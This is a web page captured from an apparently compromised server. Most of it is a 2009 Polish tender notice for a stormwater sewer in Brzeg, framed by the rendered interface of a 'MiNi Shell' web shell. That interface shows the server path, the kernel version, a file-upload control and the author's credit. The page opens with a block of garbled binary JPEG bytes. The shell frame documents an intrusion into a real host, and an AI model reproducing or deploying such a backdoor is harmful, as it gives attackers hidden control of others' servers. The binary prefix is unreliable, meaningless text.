JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090217/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090217/38685-N-2009.html

<p class="kh_header"><b>Brzeg: Budowa kanalizacji deszczowej w Brzegu z terenu ośrodka MOSiR przy ul. W. Korfantego do ul. W. Reymonta, działki nr: nr 950/3, 953/26, 953/34</b><br>
<b>Numer ogłoszenia: 38685 - 2009; data zamieszczenia: 17.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Brzeg - Burmistrz Miasta Brzegu , ul. Robotnicza 12, 49-300 Brzeg, woj. opolskie, tel. 0077 4169950, faks 077 4169952.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.brzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa kanalizacji deszczowej w Brzegu z terenu ośrodka MOSiR przy ul. W. Korfantego do ul. W. Reymonta, działki nr: nr 950/3, 953/26, 953/34.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zadania obejmuje budowę: 
- kanalizacji deszczowej z rur  PVC o250 mm o długości ok. 95 mb, 
- studzienki kanalizacyjne o600 mm, 3 szt.
- studzienki ściekowe uliczne wpusty o500 mm, 2 szt.,
zgodnie z dokumentacją projektową, wykonaną przez mgr. inż. Pawła Tkaczyńskiego, zawierającą projekt budowlany, specyfikację techniczną wykonania i odbioru robót, przedmiar robót oraz pozwoleniem na budowę, stanowiącą integralną część wzoru umowy.
Zamawiający zobowiązuje się przekazać Wykonawcy teren, na którym prowadzone będą roboty objęte wzorem umowy w najwcześniejszym możliwym terminie umożliwiającym rozpoczęcie robót ze względu na warunki atmosferyczne, najwcześniej 7 dni od dnia zawarcia umowy, a najpóźniej do dnia 10.04.2009 roku.
Po przyjęciu placu budowy Wykonawca jest odpowiedzialny za obiekt w rozumieniu przepisów prawa budowlanego.
Wykonawca zobowiązuje się do wykonania całości zadania objętego wzorem umowy w terminie 7 tygodni od dnia przekazania placu budowy, nie później jednak niż do dnia 29.05.2009 roku.
W przypadku zaistnienia konieczności wykonania robót dodatkowych lub uzupełniających, wykonanie takich robót może nastąpić jedynie na podstawie odrębnej umowy zawartej na podstawie podpisanego przez obie strony protokołu konieczności potwierdzonego przez osobę upoważnioną przez Zamawiającego.
Wykonawca wykona roboty objęte zadaniem, o którym mowa w § 1 wzoru umowy przy użyciu narzędzi i materiałów własnych.
Wykonawca zapewni nadzór na budowie, poprzez ustanowienie  kierownika budowy, posiadającego uprawnienia budowlane w branży sanitarnej konieczne do wykonania przedmiotu zamówienia oraz właściwe przestrzeganie przepisów bhp i p.poż. na remontowanym obiekcie i ponosi odpowiedzialność za wszelkie szkody wynikłe z nieprzestrzegania przez Wykonawcę tych przepisów.
Roboty, stanowiące przedmiot wzoru umowy Wykonawca zobowiązuje się wykonać z należytą starannością zgodnie z wzorem umowy, przedmiarami robót i specyfikacją techniczną wykonania i odbioru robót, sztuką budowlaną, obowiązującymi przepisami prawa, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej, w sposób zapewniający bezpieczne i higieniczne warunki pracy.
Wykonawca w trakcie realizacji przedmiotu umowy zobowiązuje się do zapewnienia obsługi
geodezyjnej, a po wykonaniu robót budowlanych przekazać Zamawiającemu kompletną dokumentację powykonawczą.
W przypadku o którym mowa w § 6 ust. 1 wzoru umowy zawarcie umowy przez Wykonawcę z Podwykonawcą wymaga zgody Zamawiającego.
Wykonawca zobowiązany jest przedstawić Zamawiającemu projekt umowy z Podwykonawcą wraz z częścią dokumentacji dotyczącej wykonania robót określonych w projekcie umowy z Podwykonawcą.
Zamawiający ma prawo zgłoszenia sprzeciwu co do osoby Podwykonawcy oraz zastrzeżeń dotyczących postanowień zawartych w projekcie umowy z Podwykonawcą.
Nie zgłoszenie przez Zamawiającego sprzeciwu lub zastrzeżeń w terminie 14 dni od przedstawienia Zamawiającemu dokumentów, o których mowa w § 6 ust. 3 wzoru umowy uznaje się za wyrażenie zgody na zawarcie umowy z Podwykonawcą.
W przypadku zawarcia umowy przez Podwykonawcę z dalszym Podwykonawcą, odpowiednie zastosowanie znajdują postanowienia § 6 ust.  3, 4 i 5 wzoru umowy
Za działania i zaniechania Podwykonawców Wykonawca ponosi wobec Zamawiającego odpowiedzialność jak za działania i zaniechania własne.
W przypadku powierzenia przez Wykonawcę części robót Podwykonawcy, Wykonawca zobowiązuje się do:
a) informowania na piśmie Zamawiającego o każdej fakturze wystawionej przez Podwykonawcę oraz terminie jej płatności, a także o dokonanej zapłacie wynagrodzenia Podwykonawcy w terminie 7 dni od dnia otrzymania tej faktury lub zapłaty wynagrodzenia Wykonawcy,
b) udostępnienia na każde żądanie Zamawiającego dokumentacji dotyczącej rozliczeń z Podwykonawcą,
c) informowania Zamawiającego na piśmie z 7 dniowym wyprzedzeniem o terminie odbioru robót Podwykonawcy oraz zapewnienia Zamawiającemu możliwości uczestniczenia w odbiorze tych robót W przypadku gdy Wykonawca nie dokonał zapłaty wynagrodzenia Podwykonawcy za wykonane przez niego roboty, Zamawiający ma prawo:
a) wstrzymać wypłatę wynagrodzenia Wykonawcy do czasu zapłaty przez Wykonawcę wynagrodzenia Podwykonawcy, lub 
b) do potrącenia z wynagrodzenia Wykonawcy należności Podwykonawcy, w przypadku zapłaty wynagrodzenia Podwykonawcy przez Zamawiającego.
Odbiór całości robót i dostaw określonych wzorem umowy nastąpi na podstawie sporządzonego na piśmie protokółu odbioru robót podpisanego przez Strony lub osoby przez nie upoważnione. 
Odpowiedzialność Wykonawcy z tytułu gwarancji wynosi 36 miesięcy na roboty budowlane i materiały użyte do ich wykonania, liczonej od dnia końcowego odbioru robót, tj. od dnia następnego podpisaniu przez strony protokołu  odbioru robót. 
Po zakończeniu całości robót objętych niniejszą umową Wykonawca zobowiązany jest uporządkować na własny koszt teren robót i przekazać go Zamawiającemu w terminie określonym w § 2 ust. 3 wzoru umowy.
W przypadku, gdy zadanie, o którym mowa w § 1 wzoru umowy wykonane zostanie wadliwie, Zmawiający ma prawo odmówić odbioru robót do czasu usunięcia wad w terminie wyznaczonym przez Zamawiającego.
Wszelkie wady powstałe w okresie rękojmi lub gwarancji Wykonawca zobowiązuje się usuwać w terminie wyznaczonym przez Zamawiającego, uwzględniającym czas na usunięcie wad. Nie usunięcie wad przez Wykonawcę w powyższym terminie uprawnia Zamawiającego, oprócz naliczenia kar umownych, o których mowa w § 2 ust. 1 lit. b) wzoru umowy, do powierzenia usunięcia tych wad podmiotowi trzeciemu na koszt i ryzyko Wykonawcy, na co niniejszym wykonawca wyraża zgodę. Skorzystanie przez Zamawiającego z powyższych uprawnień pozostaje bez wpływu na zakres i uprawnienia Zamawiającego wynikające z udzielonej gwarancji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.05.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
c) posiadają niezbędną wiedzę i doświadczenie tj. wykonali co najmniej  1 robotę o podobnym charakterze tj. związaną z wykonaniem kanalizacji deszczowej o wartości minimum 70.000,00 zł  w ciągu ostatnich 5 lat oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
2) Opis oceny spełnienia warunków: Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana na podstawie żądanych w pkt. 6 przedmiotowego postępowania oświadczeń lub dokumentów, wg formuły spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z ofertą wypełnioną na Formularzu oferty należy załączyć: 
a) oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - na zał. nr 1 do oferty, 
b) oświadczenie Wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt. 1- 3 ustawy Prawo zamówień publicznych - na zał. nr 2 do oferty, 
c) wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, odpowiadających swoim rodzajem robotom stanowiącym przedmiot zamówienia- Zamawiający przyjmuje, ze będzie to min. 1 zadanie o wartości min. 70.000,00 zł brutto polegające na wykonaniu kanalizacji deszczowej   z podaniem jej wartości, przedmiotu, dat wykonania i odbiorców - na zał. nr 3 do oferty - oraz załączenia dokumentów potwierdzających, że roboty  te zostały wykonane należycie, 
d) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Zamawiający dopuszcza możliwość złożenia czytelnej kserokopii wpisu do ewidencji działalności gospodarczej wystawionej w okresie wcześniejszym, ale potwierdzonej za zgodność z oryginałem PRZEZ ORGAN WYDAJĄCY WW.DOKUMENT W WYMAGANYM TERMINIE pod kątem aktualności stanu faktycznego z zapisami w ww. dokumencie. 
e) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,  
f) aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
g) polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, ważny na dzień otwarcia ofert,  
h) kosztorys ofertowy przygotowany na podstawie przedmiaru robót,  
i) pełnomocnictwo do reprezentowania, o ile ofertę składa pełnomocnik..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.brzeg.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji
ul. Korfantego 34
49-305 Brzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 08:30, miejsce: Urząd Miasta Brzeg
ul. Robotnicza 12 
49-300 Brzeg
biuro podawcze.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com